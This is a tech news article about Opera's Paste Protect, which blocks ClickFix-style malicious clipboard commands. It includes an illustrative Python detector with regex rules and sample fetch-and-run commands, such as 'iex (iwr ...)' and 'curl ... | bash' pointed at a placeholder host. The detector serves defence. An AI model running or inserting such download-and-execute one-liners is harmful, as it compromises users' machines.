ZDNET's key takeaways
Opera has released a new protection feature.
Paste Protect can help prevent ClickFix attacks.
The feature is free and enabled by default.
When a website tells you to "copy this command to fix the issue," you may not know it, but the command in question could be malicious. These are called ClickFix attacks, as my ZDNET colleague Charlie Osborne explains.
This social engineering technique can be adapted to various access scenarios, but in general, ClickFix aims to take advantage of human problem-solving. Fake error messages, for example, could request users to fix a minor technical problem by copying and pasting code or launching commands on their system.
To solve that problem, the developers at Opera have created Paste Protect, which detects and blocks malicious clipboard content before you can paste it into a terminal or command prompt. According to Opera, "A ClickFix attack usually starts with something small and ordinary...a video that won't play, or a CAPTCHA that won't quite verify you're human. Next, the page offers a fix for the problem by way of a short command to be pasted into the computer's terminal. Once that command is run, the computer is compromised."
According to Opera, over half of malware-loading cyber attacks in 2025 were of the ClickFix type. In fact, fake CAPTCHA attacks spiked by 563% last year.
Why ClickFix attacks dodge most defenses
ClickFix attacks sidestep nearly all existing defenses, including antivirus and email filters. The reason: Those systems are designed to check for threats from external sources, not for commands typed or pasted by the user.
"ClickFix attacks succeed because they turn the user into the weapon," said Pawel Kurzelewski, head of security at Opera. "The clipboard is the last point before a malicious command is run, so that's where we built our defense. With Paste Protect, we're stopping these attacks at the exact moment they would normally succeed."
You might recall that back in 2021, Opera released a feature of the same name. I reached out to Varsha Chowdhury (who does PR for Opera), and she had this to say:
The earlier Paste Protection feature prevented external applications from hijacking something you'd already copied and silently replacing it with something harmful, such as a malicious URL, bank account number, or crypto wallet address.
Paste Protect builds on that existing protection by adding a new Injection Protection layer. This detects and blocks malicious commands that are copied from a website—or otherwise injected into your clipboard—before they're pasted into Terminal or Command Prompt. That's the new capability designed to protect against ClickFix-style attacks.
So, in short:
Paste Protection = protects against clipboard hijacking by external applications.
Paste Protect = includes the existing Paste Protection plus the new Injection Protection, giving users protection against both clipboard hijacking and ClickFix-style clipboard injection attacks.
Opera's new feature monitors clipboard activity in real time for malicious commands that are either copied by the user or placed in the clipboard by a website. The detection technique used by Opera is tailored for Linux, macOS, and Windows to spot specific patterns associated with known malicious scripts. If one is detected, a warning pops up, explaining to the user what happened, along with a red icon in the address bar. Users will only be able to see the first 120 characters of the blocked content.
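One way a pattern-based clipboard check of this kind could work, as an added example that is not Opera's code: the rule names, the regexes, and the `inspect_clipboard` function are assumptions made for illustration. It flags text that pairs a network fetch with immediate execution (or hides the command body) and truncates the preview to the 120 characters the article mentions.

```python
import re

PREVIEW_LEN = 120  # the article says only the first 120 characters are shown

# Assumed heuristics for illustration; every regex in a rule must match.
RULES = {
    "windows": {
        "powershell fetch-and-execute": [
            r"\b(powershell|pwsh)(\.exe)?\b",
            r"\b(iex|invoke-expression)\b",
            r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b",
        ],
        "powershell encoded command": [
            r"\b(powershell|pwsh)(\.exe)?\b",
            r"\s-(e|enc|encodedcommand)\s+[a-z0-9+/=]{20,}",
        ],
        "mshta remote script": [r"\bmshta(\.exe)?\s+[\"']?https?://"],
    },
    "unix": {  # Linux and macOS shells
        "download piped to shell": [
            r"\b(curl|wget)\b[^|]*https?://[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b",
        ],
        "base64 decoded into shell": [
            r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b",
        ],
    },
}


def inspect_clipboard(text, platform):
    """Return a verdict for text that is about to be pasted into a terminal."""
    flat = " ".join(text.split())  # collapse newlines and padding
    reasons = [name for name, patterns in RULES[platform].items()
               if all(re.search(p, flat, re.IGNORECASE) for p in patterns)]
    return {"blocked": bool(reasons), "reasons": reasons,
            "preview": flat[:PREVIEW_LEN]}


# Constructed sample clipboard contents (example.invalid never resolves).
SAMPLES = [
    ("windows", 'powershell -w hidden -c "iex (iwr https://example.invalid/v.txt)"'),
    ("unix", "curl -s https://example.invalid/fix.sh | bash"),
    ("unix", "git clone https://example.invalid/project.git && cd project"),
    ("windows", "ipconfig /flushdns"),
]

if __name__ == "__main__":
    for platform, text in SAMPLES:
        print(platform, inspect_clipboard(text, platform))
```

Legitimate installers that pipe a download into a shell trip the same rule, which is the case a per-site allowlist for trusted websites has to cover.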
With this new feature, Opera is being proactive against one of the fastest-rising threats to users. Although extensions can help prevent such attacks, Opera is the first browser to have the functionality built in. This unified clipboard safety system is activated by default and allows users to whitelist trusted websites.
Even with Paste Protect enabled and active, you should always be wary of copying and pasting commands into your computer's terminal -- unless you trust the source explicitly.